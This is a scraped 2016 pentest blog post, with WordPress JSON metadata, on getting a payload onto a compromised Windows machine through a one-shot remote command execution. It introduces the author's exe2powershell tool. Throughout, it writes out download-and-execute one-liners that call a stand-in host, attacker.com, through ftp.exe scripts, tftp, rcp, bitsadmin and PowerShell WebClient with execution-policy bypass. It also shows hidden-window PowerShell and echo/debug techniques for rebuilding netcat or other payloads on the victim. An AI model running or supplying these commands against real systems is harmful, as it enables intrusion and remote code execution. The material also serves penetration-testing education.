Many methods exist, starting from solutions truly “old school” and outdated to the new that Microsoft delivers us with PowerShell.<\/p>\n
This article aims to centralize more of these methods, first to allow me to do housework in my archives and other hand to help\u00a0any pentesters on the new Windows versions.<\/p>\n
In writing this article, the creation of\u00a0“exe2powershell<\/strong>” has resulted. exe2powershell is the rebirth of exe2bat<\/strong>\u00a0compliant\u00a0with new Windows versions (7 x64, 2008R2, 2012, 8, 8.1, 10, etc.). All sources and tools presented in this article are available on my\u00a0GitHub repository<\/a>.<\/p>\n The older will remember the days of old IIS versions, in the 2000s, especially with a lovely vulnerability affecting IIS 4.0 and 5.0 called “the Unicode flaw”. This provided a shell directly through the URL by encoding in Unicode the sequence “..\/” to go back to the call of “cmd.exe”.<\/p>\n Faille unicode IIS 5.0<\/p><\/div>\n This “remote command execution” (RCE) was obviously not\u00a0interactive: the command “telnet”, “edit” or even “ftp” did not allow for further interaction with the shell. He had orders to “one-shot” commands directly returning a result. In other words, only “one-liners” commands are allowed to compromise\u00a0a server as part of a pentest.<\/p>\n During\u00a0pentest, obtaining a shell is usually the Grail: a shell obtained on a machine clearly means his end.<\/strong>\u00a0This is not the final step, the attacker will try to escalate\u00a0the privileges to perpetuate its access (deployment of a backdoor, RAT, rootkit), it will look at his tracks and will exploit resources for its purposes (botnet, spam, stromaking, spying…). But between getting an RCE\u00a0\/ shell and this purpose, it needs to increase its influence on the system.<\/p>\n As shown with the “Unicode flaw”, remote commands execution on a system can take various forms:<\/p>\n Long before the emergence and mass adoption of frameworks and fabulously wealthy kits to powerful tools such as MSF<\/a> or mimikatz<\/a> the pentester should equip the compromised machine with a multitude of binary executables to achieve his ends, which is of particular interest to the question “How to upload a file through Windows command line?<\/strong>”<\/p>\n Today, the pentesters seek ease and especially avoid reinventing the wheel. What better than to establish a Meterpreter reverse-shell, allowing to have the fabulous tool box and the power of Metasploit<\/a>?<\/p>\n Through the execution of remote commands the attacker has, the idea will be to transfer a payload (payload.exe, calculator calc.exe in the examples below), which will allow him to dispose of a truly interactive shell once charged on the victim side (dropper).<\/p>\n The methods that follow, more or less old (but not as much non-functional) can transfer an arbitrary file “payload.exe” in command line to\u00a0a compromised machine.<\/p>\n The method with “ftp.exe” (File Transfer Protocol – port 21 TCP), Windows native binary located in “% systemroot%\\System32\\ftp.exe”, retrieve file “payload.exe” hosted on a FTP server controlled by the attacker. The “interactive” aspect\u00a0is somewhat embarrassing, especially when we encounter RCE similar to IIS5 today. Thus, the idea is to design a “ftp.txt” file that will list all the commands, and then call the command “ftp” with the attribute “-s: ftp.txt” to automatically chaining these actions :<\/p>\n One-liner version :<\/p>\n Very popular in the days of “stromaking” (hidden occupation and usurpation of available disk space on servers in order to store\u00a0any kind of content, including “warez”), sysadmins had found a solution: remove the binary “ftp.exe” of System32. Of course, it can be regenerated \/ returned to its place …<\/p>\n When sysadmins deleted\u00a0by preventing the “ftp.exe”, the attackers fell back on “tftp.exe” (Trivial File Transfer Protocol). Also native Windows System32 binary but disabled\u00a0by default after Windows XP \/ 2003, this tool from the command line allows file download\u00a0in a single line (one-liner) via a UDP channel on port 69 by default.<\/p>\n As before, the attacker must have a TFTP server under his control so that the compromised machine comes seek his payload.exe. Such TFTP server is easily implemented with tftpy<\/a> in Python, Tftpd32\/64<\/a>\u00a0in\u00a0Windows or Linux atftp<\/a>.<\/p>\n Then, with one-liner command:<\/p>\n Regularly used at the time to transmit binary via Unicode flaw (nc.exe), this method is now considered obsolete because\u00a0the binary “tftp.exe” is no more present by default in the Windows OS.<\/p>\n Faille Unicode IIS5.0 upload via TFTP<\/p><\/div>\n rcp.exe is a System32 binary too which is part of the “R-command” utilities of Windows. This one is not present by default since Windows 7, like\u00a0RSH:<\/p>\n Not available by default in Windows 7 but can be enabled by turning on the Subsystem for UNIX-based Applications Windows feature from Programs and Features in Control Panel and then installing the Utilities and SDK for UNIX-based Applications.<\/p><\/blockquote>\n This tool allows you to recover files as TFTP, with an authentication phase. Rarely used compared to\u00a0FTP.exe or TFTP.exe, sysadmins forgot\u00a0renaming or deleting it.<\/p>\n As for the TFTP method, it is necessary on the attacker\u00a0side to set up a “RCP server.” This can be done very simply by using the tool “rcp32bit.exe<\/strong>“. Once executed, this server will extract a multitude of files. To configure the server, open the executable “QVTNET32.EXE<\/strong>“, visit the “Service<\/strong>” tab, then “Server<\/strong>“. Check “Set default<\/strong>” and enable “RCP Server<\/strong>“. Finally, in the “Password File<\/strong>” field, enter an authentication filename like “rcpass.txt<\/strong>”<\/p>\n Configuration serveur RCP<\/p><\/div>\n Save this configuration and leave open the application so that the server is still listening. The RPC server is set up with the account.<\/p>\n In the compromised machine side, it only remains to initiate the transfer using the command:<\/p>\n Transfert de fichier via RCP<\/p><\/div>\n “Windows Scripting Host” (WSH) scripts can also be used via the generation of a * .vbs file and use the binary “cscript.exe” natively under Windows environments.<\/p>\n Such scripts offer many opportunities for an attacker, including file recovery rarely filtered through the HTTP protocol (for example x.vbs):<\/p>\n xsh script<\/p><\/div>\n Download through HTTP and execute version one-liner:<\/p>\n xsh one-liner<\/p><\/div>\n WSH download and execute payload<\/p><\/div>\n Note<\/strong> : The HTTP return code of the request\u00a0must be a “200 OK” in\u00a0the previous script. No redirection 302\/303.<\/p>\n A new tool in console mode was introduced with Windows 7. This is called “Bitsadmin.exe” and retrieves (or send) files with command line. This tool provided details of the progress of interactively download. However, it is fully operable via a simple shell (like a Netcat for example). Another advantage is that in case of network\u00a0failure, bitsadmin is able to suspend transfers and resume once connection is restored.<\/p>\n BITSadmin download and execute payload<\/p><\/div>\n Bitsadmin is no more destined to be used (replaced by PowerShell cmdlets); it\u00a0also tells at its launch:<\/p>\n BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows. PowerShell, finally a true “shell” syntax, functions and features\u00a0for Windows environments … With the arrival of this Microsoft “shell ++” on the latest environment (since Windows 7\/2008), commands to retrieve files directly followed. The idea is to use the binary “powershell.exe” natively on the latest versions of Windows coupled with a PowerShell script (*.ps1) or through a PowerShell syntax directly from the command line (eval). Example x.ps1:<\/p>\n Command line execution<\/p>\n The PowerShell code can be transmitted directly from the command line without the need to create a file on the file system:<\/p>\n PowerShell download and execute payload<\/p><\/div>\n Or\u00a0:<\/p>\n Another method especially “old school” is to convert a *.exe (the payload) into printable ASCII character on the screen (thus a hex form). This long hexadecimal string will be placed on the compromised machine in a simple text file via “echo” commands.<\/p>\n Then, later, the native binary “debug.exe” in olf Windows (not present since Windows 7 x64, but is still on Windows 7 32bit), can be used to regenerate the original binary payload.exe from its hexadecimal code.<\/p>\n This method requires several factors:<\/p>\n The binary (payload.exe) to be converted to hexadecimal (.bat) via exe2bat must be the smallest possible. Exe2bat operates\u00a0perfectly to regenerate the “ftp.exe” or “tftp.exe” that sysadmins suppressed by prevention. It is also suitable for “nc.exe” or payloads \/ droppers very small generated by msfvenom.<\/p>\n To maximize the conversion of a binary, it is advisable to compress the binary via “UPX” before his BAT conversion. Take the example of Netcat makes 61,440 bytes in its original version. It can be compressed via UPX:<\/p>\n The size of Netcat is divided by two\u00a0(30720 bytes), without altering its original feature.<\/p>\n It only remains to convert the 30kB binary via exe2bat:<\/p>\n The resulting nc.txt file lists all the hexadecimal code of “nc.exe compressed by UPX” with commands “echo” and “debug” for final reconstruction of the original binary:<\/p>\n exe2bat nc.exe compress\u00e9 en UPX<\/p><\/div>\n Linking these commands on the compromised machine, the original “nc.exe” will be created on the server.<\/p>\n Reminder<\/strong>: this methodology requires the use of “debug.exe” an obsolete 16-bit application that is no more present on Windows systems since\u00a0Windows 7 x64. For newer versions of Windows, see the next\u00a0methodology.<\/p>\n In view of the above detailed limitations exe2bat, I undertook to create “exe2powershell<\/a><\/strong>” which overcomes these problems environments. So “exe2powershell” is fully functional on modern Windows, especially x64 architectures (Windows 7×64, Windows 2008R2, Windows 8 \/ 8.1, Windows 2012, Windows 10).<\/p>\n The idea is similar to exe2bat: generate a * .bat file containing a multitude of “echo” lines of displayable code (in decimal this time) of a binary (payload.exe) input. Then, once the file is recreated on the compromised machine, calling a PowerShell command to reconstruct the original binary.<\/p>\n No more need to “debug.exe!” PowerShell can replace it!<\/strong><\/p>\n Also, I removed the limitation of 64kB input\u00a0file. The operation is described below.<\/p>\n You can create a text file (payload.txt) containing the image of a binary to decimal (payload.exe).<\/p>\n The regeneration of the original binary is done with the following command:<\/p>\n The problem is that the text file “payload.txt” is relatively large (several thousand characters for Netcat for example), and\u00a0the Windows shell truncate too long command. Thus, it is not possible to:<\/p>\n We must cut this large payload composed of decimal characters with several\u00a0“echo”, set at 128 characters in exe2powershell. Each of these “echo” commands should be played one after another for remote reproduce the “payload.txt”. Once regenerated this file, the previous PowerShell command to rebuild the original executable can be run.<\/p>\n All operation was integrated into “exe2powershell” which is based on the original “exe2bat” code. Usage\u00a0is as follows:<\/p>\n Output BAT file :<\/p>\n exe2powershell r\u00e9sultats<\/p><\/div>\n Several small binary tools used on the command line are available for Windows, including “hget”, “wget” or “FTPit”.<\/p>\n These can be sent on a compromised machine to facilitate subsequent future binary downloads.<\/p>\n Many other non-native Windows tools exist, destined to replace or add file transfer functionality on these OS. Developers do not lack imagination and keep in mind the concept of “small” binary to easily transfer via exe2bat or exe2powershell.<\/p>\n A pentester always find a way to upload files on a compromised machine via a “remote command execution”. Although sysadmins have deleted ftp.exe, tftp.exe or rcp.exe from System32.<\/p>\n These methods are still relevant in today’s time in 2016. The drafting of this article has begun after\u00a0a pentest I realized last week when I am faced with these issues on a Windows Server 2008 R2 particularly restrained.<\/p>\n Having concluded that only the “exe2bat” method can be exploited, I quickly found that it was no longer functional on the new Windows, hence the motivation to create exe2powershell<\/a>.<\/p>\n Tools, converter and compressor, and all binary discussed in this article have been centralized in a downloadable package here<\/a>.<\/p>\n If other methods are known to you, even if they are “old school” or news, please indicate to me that I can add them\u00a0in this article.<\/p>\n Sources & resources :<\/strong><\/p>\n <\/p>","protected":false},"excerpt":{"rendered":" How to upload \/ transfer a file through a shell \/ terminal DOS on Windows? There is no “wget” easy […]<\/p>\n","protected":false},"author":1337,"featured_media":1898,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[59,165,14,167],"tags":[446,443,448,447,450,444,442,449,34,445,441],"class_list":["post-1866","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-administration-reseaux-et-systemes","category-os","category-vuln-exploit-poc","category-windows","tag-bitsadmin","tag-cscript-exe","tag-debug-exe","tag-exe2bat","tag-exe2powershell","tag-ftp-exe","tag-nc-exe","tag-powershell","tag-shell","tag-tftp-exe","tag-upload"],"_links":{"self":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts\/1866","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/users\/1337"}],"replies":[{"embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/comments?post=1866"}],"version-history":[{"count":32,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts\/1866\/revisions"}],"predecessor-version":[{"id":1932,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts\/1866\/revisions\/1932"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/media\/1898"}],"wp:attachment":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/media?parent=1866"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/categories?post=1866"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/tags?post=1866"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}History, pas and present reasons to upload via a shell<\/h1>\n
![\"Faille](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/iis5_unicode-300x97.png\")
<\/a>\n
The various methods to upload<\/h1>\n
FTP.EXE : the traditional for\u00a0“stromaking”<\/h2>\n
\nUsed interactively, all syntaxes “FTP” can also be scripted:<\/p>\nopen attacker.com 21\r\nUSER attacker\r\nPASS PaSsWoRd\r\nbinary\r\nGET \/payload.exe\r\nquit<\/pre>\n
@echo open attacker.com 21> ftp.txt\r\n@echo USER attacker >> ftp.txt\r\n@echo PASS PaSsWoRd >> ftp.txt\r\n@echo binary >> ftp.txt\r\n@echo GET \/payload.exe >> ftp.txt\r\n@echo quit >> ftp.txt\r\nftp -s:ftp.txt -v<\/pre>\n
cmd.exe \/c \"@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET \/payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v\"<\/pre>\n
TFTP.EXE : the must in\u00a0IIS 5 times !<\/h2>\n
tftp -i attacker.com\u00a0get payload.exe<\/pre>\n
![\"Faille](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/iis5_unicode_2-300x208.png\")
<\/a>RCP : Remote Copy Command, the little forgotten…<\/h2>\n
![\"Configuration](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/rcp1-261x300.jpg\")
<\/a>
\nIt is necessary now to generate credentials (login \/ password) for\u00a0the RCP server. Via a command prompt, use the binary “PASSWD.exe<\/strong>” included in the package “rcp32bit.exe” :<\/p>\nC:\\RCP>PASSWD.EXE\u00a0rcpass.txt\r\nWinQVT\/Net Password File Utility\r\nNew file.\r\nUsernames:\r\nEnter Option (C[number]=Change, A=Add, D[number]=Delete, E=Exit): a\r\nAdd User: Admin\r\nUsername: Admin\r\nPassword:\r\nVerify:\r\nUsernames:\r\n1. Admin\r\nEnter Option (C[number]=Change, A=Add, D[number]=Delete, E=Exit): e<\/pre>\n
rcp.exe -b attacker.com.Admin:payload.exe payload.exe<\/pre>\n
![\"Transfert](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/rcp2-300x175.jpg\")
<\/a>CSCRIPT.EXE : The\u00a0WSH method (Windows Scripting Host)<\/h2>\n
![\"xsh](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/xsh1-150x150.png\")
<\/a>![\"xsh](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/xsh2-150x150.png\")
<\/a>![\"WSH](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/WSH-300x117.png\")
<\/a>BITSadmin :\u00a0interactive new tool since Windows 7<\/h2>\n
cmd.exe \/c \"bitsadmin \/transfer myjob \/download \/priority high http:\/\/attacker.com\/payload.exe %tmp%\\payload.exe&start %tmp%\\payload.exe\"<\/pre>\n
![\"BITSadmin](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/BITSadmin-300x267.png\")
<\/a>
\nAdministrative tools for the BITS service are now provided by BITS PowerShell cmdlets.<\/p><\/blockquote>\nPowerShell, the powerfull…<\/h2>\n
$down = New-Object System.Net.WebClient\r\n$url = 'http:\/\/attacker.com\/payload.exe';\r\n$file = 'payload.exe';\r\n$down.DownloadFile($url,$file);\r\n$exec = New-Object -com shell.application\r\n$exec.shellexecute($file);<\/pre>\n
powershell.exe -executionpolicy bypass -file x.ps1<\/pre>\n
powershell (New-Object System.Net.WebClient).DownloadFile('http:\/\/attacker.com\/payload.exe','payload.exe');Start-Process 'payload.exe'<\/pre>\n![\"PowerShell](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/PowerShell-300x100.png\")
<\/a>powershell (New-Object System.Net.WebClient).DownloadFile('http:\/\/attacker.com\/payload.exe','payload.exe');(New-Object -com Shell.Application).ShellExecute('payload.exe');<\/pre>\nexe2bat and\u00a0debug.exe<\/h2>\n
\n
C:\\Users\\admin\\Desktop>upx nc.exe\r\n Ultimate Packer for eXecutables\r\n Copyright (C) 1996 - 2013\r\nUPX 3.91w Markus Oberhumer, Laszlo Molnar & John Reiser Sep 30th 2013\r\nFile size Ratio Format Name\r\n -------------------- ------ ----------- -----------\r\n 61440 -> 30720 50.00% win32\/pe nc.exe\r\nPacked 1 file.<\/pre>\n
C:\\Users\\admin\\Desktop>exe2bat.exe nc.exe nc.txt\r\nFinished: nc.exe > nc.txt<\/pre>\n
![\"exe2bat](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/exe2bat-300x169.png\")
<\/a>exe2powershell : exe2bat reborn !<\/h2>\n
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -Command \"[byte[]] $hex = get-content -encoding byte -path payload.exe;[System.IO.File]::WriteAllLines('payload.txt', ([string]$hex))\"<\/pre>\npowershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -Command \"[string]$hex = get-content -path payload.txt;[Byte[]] $temp = $hex -split ' ';[System.IO.File]::WriteAllBytes('payload2.exe', $temp)\"<\/pre>\necho VERY_LONG_PAYLOAD.TXT_CONTENT > payload.txt<\/pre>\n
C:\\Users\\admin\\Desktop>exe2powershell.exe nc.exe nc.bat\r\n\r\n [ exe2bat reborn in exe2powershell for modern Windows ]\r\n [ initial author ninar1, based on riftor work, and modernized by ycam ]\r\n [ exe2powershell version 1.0 - keep up to date : www.asafety.fr ]\r\n\r\n [*] Finished: nc.exe > nc.bat<\/pre>\n
![\"exe2powershell](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/exe2powershell-300x158.png\")
<\/a>Other non-native tools in Windows<\/h2>\n
\n
Conclusion\u00a0and download<\/h1>\n
\n
\n
\n
\n
\n